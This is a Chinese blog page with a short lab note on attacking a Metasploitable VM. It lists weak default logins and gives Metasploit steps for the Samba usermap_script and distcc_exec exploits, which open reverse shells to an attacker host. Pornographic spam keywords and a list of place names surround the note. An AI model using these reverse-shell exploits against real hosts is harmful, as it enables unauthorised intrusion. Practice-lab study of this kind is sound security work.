亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Samba&distcc 漏洞

發布時間:2020-05-27 16:57:09 來源:網絡 閱讀:1040 作者:GeForever 欄目:安全技術

漏洞測試確實是可以的  當時把文章copy下來進行再進行測試。但是沒有copy到圖片,實驗是成功了,但是沒有那么直觀。

使用metasploit

對metasploitable 靶服務器進行***

metasploitable 是ubuntu8.0的版本

 

neuss掃描到漏洞

139端口可以獲取該系統主機名為“METASPLOITABLE”,注釋“metasploitable server (Samba 3.0.20-Debian)”;

系統存在弱口令,用戶user、msfadmin密碼與用戶名一樣,使用net use命令能夠建立連接查看共享資源。ftp開放版本信息 ProFTPD 1.3.1 Server (Debian),user這個用戶在ftp中也可以使用;

telnet服務開放,可確定該系統為Ubuntu 8.04,用戶user、msfadmin可以登錄,并獲得相應權限。如果不存在弱口令,通過截獲該telnet數據也能獲取用戶口令

一個distcc漏洞

一個samba 共享服務漏洞

 

 

msf對靶服務器的工具

smb-samba 共享服務

 

use exploit/multi/samba/usermap_script

set payload cmd/unix/reverse

set rhost (ip address)

set lhost (ip address)

exploit

 

use exploit/unix/misc/distcc_exec

set payload cmd/unix/reverse_perl

set rhost  (ip address)

set lhost  (ip address)

exploit

 

distcc 成功 但是沒有root的權限

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

大厂| 大姚县| 嵊泗县| 澜沧| 华池县| 汪清县| 武强县| 桓仁| 西华县| 莒南县| 辛集市| 哈密市| 垦利县| 新河县| 涟源市| 北宁市| 长武县| 闸北区| 监利县| 中宁县| 屯门区| 平乡县| 冀州市| 南召县| 阳春市| 内江市| 城口县| 原阳县| 休宁县| 隆尧县| 延长县| 百色市| 德庆县| 都江堰市| 屯门区| 固原市| 云南省| 乐业县| 偏关县| 壤塘县| 黔东|